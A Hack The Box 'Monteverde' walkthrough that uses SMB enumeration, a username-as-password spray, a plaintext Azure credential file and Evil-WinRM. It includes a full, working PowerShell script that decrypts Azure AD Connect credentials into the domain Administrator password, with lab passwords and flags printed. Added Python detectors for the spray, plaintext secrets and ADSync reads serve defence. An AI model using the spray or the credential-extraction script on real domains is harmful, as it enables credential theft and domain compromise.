As the second new box of 2020, Monteverde came into play. A Medium Windows box, good for 30 points towards your next status on Hack The Box. Personally, I like the Windows machines better than the Linux ones, but that's purely because I'm more involved with the Microsoft ecosystem. Enough general shizzle, time to discover Monteverde.
An Nmap scan a day keeps the doctor away. First, let's see what is available on this Windows box. LDAP, SMB and WinRM are available, so chances are that a large part of the enumeration can be done through them.
nmap -sC -sV -T5 -oA monteverde 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT
Nmap scan report for 10.10.10.172
Host is up (0.061s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3FE556%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 9m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T11:08:14
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds
With enum4linux you can quickly see whether accounts can be found, what the domain is, and which group memberships exist.
enum4linux 10.10.10.172
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================================
| Getting domain SID for 10.10.10.172 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)
=============================
| Users on 10.10.10.172 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
group:[Developers] rid:[0xa34]
The output returns a number of usernames but no further hints about passwords. I put the usernames in a text file to quickly check whether any of these accounts can be logged into, using the smb_login module in Metasploit.
msfconsole
=[ metasploit v5.0.72-dev ]
+ -- --=[ 1963 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion
First, I try the USER_AS_PASS option. With this option the username is used as the password for every user in my user list: a quick way to spot accounts a lazy administrator has set up with the password equal to the username.
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172
RHOSTS => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK
SMBDomain => MEGABANK
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt
USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > run
Failed, Failed, Failed, Success! It looks like the password of SABatchJobs is simply SABatchJobs.
[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\Guest:Guest',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\roleary:roleary',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
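The USER_AS_PASS run above is a password spray: one guess per account, so a per-account lockout threshold never trips. The defender's view of that same sequence is a burst of logon failures (event 4625, network logon type 3) for many different accounts from one source, followed by a success (4624). The detector below is an added example, not part of the original write-up; the events are constructed to mirror the smb_login run (the source address 10.10.14.5 and the timestamps are assumptions), plus a benign user mistyping a password twice.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

EVENT_LOGON_FAILED = 4625
EVENT_LOGON_SUCCESS = 4624
NETWORK_LOGON = 3  # SMB logons are recorded with logon type 3

# Constructed sample events. The target accounts mirror the smb_login run;
# the source 10.10.14.5 and all timestamps are assumptions. The 10.10.10.50
# entries are a benign user who mistypes a password twice and then gets in.
SAMPLE_EVENTS = [
    {"time": "2020-02-09T11:02:01", "event_id": 4625, "user": "dgalanos",    "source": "10.10.14.5",  "logon_type": 3},
    {"time": "2020-02-09T11:02:02", "event_id": 4625, "user": "Guest",       "source": "10.10.14.5",  "logon_type": 3},
    {"time": "2020-02-09T11:02:03", "event_id": 4625, "user": "mhope",       "source": "10.10.14.5",  "logon_type": 3},
    {"time": "2020-02-09T11:02:04", "event_id": 4625, "user": "roleary",     "source": "10.10.14.5",  "logon_type": 3},
    {"time": "2020-02-09T11:02:05", "event_id": 4624, "user": "SABatchJobs", "source": "10.10.14.5",  "logon_type": 3},
    {"time": "2020-02-09T11:03:10", "event_id": 4625, "user": "smorgan",     "source": "10.10.10.50", "logon_type": 3},
    {"time": "2020-02-09T11:03:25", "event_id": 4625, "user": "smorgan",     "source": "10.10.10.50", "logon_type": 3},
    {"time": "2020-02-09T11:03:40", "event_id": 4624, "user": "smorgan",     "source": "10.10.10.50", "logon_type": 3},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_spray(events, window=timedelta(minutes=5), min_accounts=3):
    """Return one alert per source address that failed logons for at least
    `min_accounts` distinct accounts inside `window`. A spray touches each
    account once, so the correlation must be per source, not per account."""
    by_source = defaultdict(list)
    for e in events:
        if e["logon_type"] == NETWORK_LOGON and e["event_id"] in (EVENT_LOGON_FAILED, EVENT_LOGON_SUCCESS):
            by_source[e["source"]].append(e)

    alerts = []
    for source, evs in by_source.items():
        evs.sort(key=_ts)
        failures = [e for e in evs if e["event_id"] == EVENT_LOGON_FAILED]
        best = None
        start = 0
        for end in range(len(failures)):
            # Slide the window start forward until the span fits in `window`.
            while _ts(failures[end]) - _ts(failures[start]) > window:
                start += 1
            accounts = {f["user"] for f in failures[start:end + 1]}
            if len(accounts) >= min_accounts and (best is None or len(accounts) > len(best["accounts"])):
                best = {"accounts": accounts, "first": failures[start], "last": failures[end]}
        if best is None:
            continue
        # A success from the same source shortly after the burst is the part
        # that matters most: a spray that worked.
        deadline = _ts(best["last"]) + window
        successes = [e["user"] for e in evs
                     if e["event_id"] == EVENT_LOGON_SUCCESS and _ts(best["first"]) <= _ts(e) <= deadline]
        per_account = Counter(f["user"] for f in failures)
        alerts.append({
            "source": source,
            "accounts": sorted(best["accounts"]),
            "first_failure": best["first"]["time"],
            "last_failure": best["last"]["time"],
            "max_failures_per_account": max(per_account.values()),
            "successes_after": successes,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f"[!] spray from {a['source']}: {len(a['accounts'])} accounts, "
              f"max {a['max_failures_per_account']} failure(s) per account, "
              f"successful logon(s) afterwards: {a['successes_after'] or 'none'}")
```

The `max_failures_per_account` field is the point: it stays at 1 for the spray, which is exactly why an account-lockout policy alone does not catch this, while the benign user trips two failures on a single account and no alert.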
[0x3] Path to User flag
The SABatchJobs account cannot connect via Windows Remote Management, so I first browse the SMB shares with the password just found.
smbclient -U SABatchJobs -L 10.10.10.172
Enter WORKGROUP\SABatchJobs's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
The users$ share contains a number of directories that I cannot access with these credentials. The only file visible is azure.xml.
smbclient \\\\monteverde\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Fri Jan 3 13:12:48 2020
.. D 0 Fri Jan 3 13:12:48 2020
dgalanos D 0 Fri Jan 3 13:12:30 2020
mhope D 0 Fri Jan 3 13:41:18 2020
roleary D 0 Fri Jan 3 13:10:30 2020
smorgan D 0 Fri Jan 3 13:10:24 2020
\dgalanos
. D 0 Fri Jan 3 13:12:30 2020
.. D 0 Fri Jan 3 13:12:30 2020
\mhope
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
\roleary
. D 0 Fri Jan 3 13:10:30 2020
.. D 0 Fri Jan 3 13:10:30 2020
\smorgan
. D 0 Fri Jan 3 13:10:24 2020
.. D 0 Fri Jan 3 13:10:24 2020
524031 blocks of size 4096. 518419 blocks available
A config file for Azure, serialized from PowerShell, but otherwise I don't expect to need much of this in terms of code. What is interesting is the Password property. Since this file is in mhope's directory, this may be his password.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
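The file above is CLIXML, the format Export-Clixml writes: every object carries its .NET type names in `<TN>`, and each property in `<Props>` is typed by its element name (`<S>` string, `<DT>` datetime, `<G>` GUID). The find is only dangerous because the Password sits in a plain `<S>` element; a PSCredential exported the same way stores its password as `<SS>`, a DPAPI-protected SecureString that only the exporting user on the exporting machine can read back. The scanner below is an added example (not the author's tooling) for auditing shares for such files: it parses the page's azure.xml and a constructed PSCredential export (placeholder blob) and reports which secret-looking properties are stored in plaintext.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Property names worth flagging when serialized as plain <S> strings.
SECRET_PROPERTY_NAMES = {"password", "secret", "secrettext", "clientsecret", "apikey", "token"}

# The azure.xml from the users$ share, as shown on the page.
AZURE_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>"""

# Constructed counter-example: the shape Export-Clixml gives a PSCredential.
# The Password is an <SS> (SecureString, DPAPI-protected); the blob is a placeholder.
PSCREDENTIAL_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">MEGABANK\\svc-example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297ebPLACEHOLDER</SS>
    </Props>
  </Obj>
</Objs>"""


def _q(tag):
    """Qualify a CLIXML element name with the PowerShell namespace."""
    return f"{{{PS_NS}}}{tag}"


def _local(tag):
    return tag.rsplit("}", 1)[-1]


def find_serialized_secrets(xml_text):
    """Walk every <Obj> in a CLIXML document and report secret-looking
    properties. 'plaintext' is True for an <S> string; an <SS> element is a
    SecureString and is not readable outside the exporting user context."""
    root = ET.fromstring(xml_text)
    type_tables = {}  # TN RefId -> type names, for objects that use <TNRef>
    findings = []
    for obj in root.iter(_q("Obj")):
        tn = obj.find(_q("TN"))
        if tn is not None:
            types = [t.text for t in tn.findall(_q("T"))]
            type_tables[tn.get("RefId")] = types
        else:
            ref = obj.find(_q("TNRef"))
            types = type_tables.get(ref.get("RefId"), []) if ref is not None else []
        obj_type = types[0] if types else "(untyped)"

        props = obj.find(_q("Props"))
        if props is None:
            continue
        for prop in props:
            name = prop.get("N") or ""
            if name.lower() not in SECRET_PROPERTY_NAMES:
                continue
            findings.append({
                "type": obj_type,
                "property": name,
                "plaintext": _local(prop.tag) == "S",
                "value": prop.text or "",
            })
    return findings


def mask(value, keep=2):
    """Show only the first few characters when reporting a finding."""
    return value[:keep] + "*" * max(len(value) - keep, 0)


if __name__ == "__main__":
    for label, doc in (("azure.xml", AZURE_XML), ("constructed PSCredential export", PSCREDENTIAL_XML)):
        for f in find_serialized_secrets(doc):
            state = "PLAINTEXT" if f["plaintext"] else "SecureString (DPAPI)"
            print(f"{label}: {f['type']}.{f['property']} = {mask(f['value'])} [{state}]")
```

Pointed at a share, the same function run over every *.xml file turns "someone left a credential object on users$" into a finding that names the object type and the offending property, without the reviewer having to open the file.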
After the first user, I now have a set of credentials for mhope. I expect this also gives me the user flag.
evil-winrm -i monteverde -u "megabank\mhope" -p "4n0therD4y@n0th3r$"
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
The user flag is in. Now on to finding a way to root.
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
[0x4] Path to Root flag
The machine is fairly bare and there is little of interest to browse through. In C:\Program Files you can see that this machine is equipped with Azure AD Connect, a piece of tooling for synchronizing your on-premises Active Directory to Azure Active Directory. I do not expect this on an HTB box without it having a purpose. Will this be the way to root?
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:31 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
After some searching on Google I find the article "Azure AD Connect for Red Teamers". The article explains how to use a PowerShell script to dump the username and password of the account Azure AD Sync runs with. The script is on the website; however, it does not work directly on this box.
After some errors about not being able to connect, I made some adjustments to the script. On the machine I found the folder C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER, which explains why it is not working: the connection string in the original script does not work with this version of MSSQL, because MSSQL14 = Microsoft SQL Server 2017.
The line below is the one from the original script that I adapted so that the connection string works with the version of MSSQL installed on Monteverde.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
Here is a working script for dumping the Azure AD Sync credentials. As you can see at $client, the connection string is different from the original on XPN InfoSec's blog.
# Azure-ADConnect-CredentialExtract.ps1
# Original author: Azure AD Connect for Red Teamers (XPN, Adam Chester)
# Changes: adjusted the $client connection string for MSSQL 2017.
#
# Step 1: connect to the ADSync database. The original targeted a LocalDB instance;
# here it is a full SQL Server 2017 instance on localhost, using integrated
# authentication (Database and Initial Catalog are synonyms, one is enough).
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Trusted_Connection=yes;"
$client.Open()
# Step 2: read the identifiers that select the key set: the keyset id, the
# instance GUID and the entropy GUID stored in mms_server_configuration.
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
# Step 3: read the AD connector's configuration XML (plain) and its encrypted
# credential blob from mms_management_agent.
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
# Step 4: load the ADSync crypto assembly, load the key set with the values from
# step 2, and decrypt the blob with the key it references.
add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
# Step 5: the domain and username live in the configuration XML, the password in
# the decrypted XML.
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("[+] Domain: " + $domain.Domain)
Write-Host ("[+] Username: " + $username.Username)
Write-Host ("[+]Password: " + $password.Password)
I modified and saved the script locally on my laptop. With the built-in upload command of the Evil-WinRM shell you can easily copy it to the remote box.
*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1
Info: Uploading Azure-ADConnect-CredentialExtract.ps1 to C:\users\mhope\Videos\ad2.ps1
Data: 2288 bytes of 2288 bytes copied
Info: Upload successful!
And there you have it! In this case, the Administrator account was used for Azure AD Sync.
*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
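What makes this extraction visible is that the script talks to the ADSync database as the logged-in Windows user (Trusted_Connection) and reads two specific tables in one session: mms_server_configuration for the key material and mms_management_agent for the encrypted connector credentials. The sync service itself is the only thing that should ever read those. The detector below is an added example, not part of the write-up or of XPN's tooling: it runs over constructed audit records of the kind a SQL Server audit on the ADSync database would produce, with the page's two queries issued by mhope, and flags reads of the sensitive tables by any login other than the one the service runs as (the "NT SERVICE\ADSync" login and the application names are assumptions to tune for your own server).

```python
import re

# Tables holding the ADSync key material and the encrypted connector credentials.
KEY_MATERIAL_TABLE = "mms_server_configuration"
CONNECTOR_TABLE = "mms_management_agent"
SENSITIVE_TABLES = {KEY_MATERIAL_TABLE, CONNECTOR_TABLE}

# Assumption: the only login expected to read these tables is the one the
# ADSync service runs as; adjust to the service account on your own server.
EXPECTED_LOGINS = {r"NT SERVICE\ADSync"}

# Constructed audit records (session id, login, client application, statement).
# Rows 1 and 2 are the two queries from the script above, as issued from a
# PowerShell session by mhope; row 0 stands in for the sync service's own
# access; row 3 is an unrelated read of a non-sensitive table.
SAMPLE_AUDIT = [
    {"session": 51, "login": r"NT SERVICE\ADSync", "app": "sync service (assumed name)",
     "statement": "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent"},
    {"session": 63, "login": r"MEGABANK\mhope", "app": ".Net SqlClient Data Provider",
     "statement": "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"},
    {"session": 63, "login": r"MEGABANK\mhope", "app": ".Net SqlClient Data Provider",
     "statement": "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"},
    {"session": 63, "login": r"MEGABANK\mhope", "app": ".Net SqlClient Data Provider",
     "statement": "SELECT COUNT(*) FROM mms_run_history"},
]

TABLE_RE = re.compile(r"\b(mms_[a-z_]+)\b", re.IGNORECASE)


def tables_touched(statement):
    """Lower-cased set of mms_* table names referenced by a statement."""
    return {m.lower() for m in TABLE_RE.findall(statement)}


def audit_adsync_reads(records):
    """Flag every read of a sensitive ADSync table by an unexpected login. A
    session that has read both tables matches the credential-extraction
    pattern (key material plus encrypted blob) and is marked as such."""
    alerts = []
    tables_by_session = {}
    for r in records:
        hit = tables_touched(r["statement"]) & SENSITIVE_TABLES
        if not hit or r["login"] in EXPECTED_LOGINS:
            continue
        seen = tables_by_session.setdefault(r["session"], set())
        seen |= hit
        alerts.append({
            "session": r["session"],
            "login": r["login"],
            "app": r["app"],
            "tables": sorted(hit),
            "extraction_pattern": SENSITIVE_TABLES <= seen,
        })
    return alerts


if __name__ == "__main__":
    for a in audit_adsync_reads(SAMPLE_AUDIT):
        tag = "CREDENTIAL EXTRACTION PATTERN" if a["extraction_pattern"] else "sensitive read"
        print(f"[{tag}] session {a['session']} {a['login']} via {a['app']}: {', '.join(a['tables'])}")
```

The second alert is the one that should page someone: the same session has now read both the key material and the encrypted configuration, which is exactly the sequence the script performs. The damage is bounded by what the sync account is allowed to do, and on this box that account is the domain Administrator.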
Through Evil-WinRM I can log in with the newly acquired Administrator credentials.
evil-winrm -i monteverde -u "megabank\Administrator" -p "d0m@in4dminyeah!"
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
As the last step of this box, I take the root flag. With this, Monteverde is officially rooted!
cat c:\Users\Administrator\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc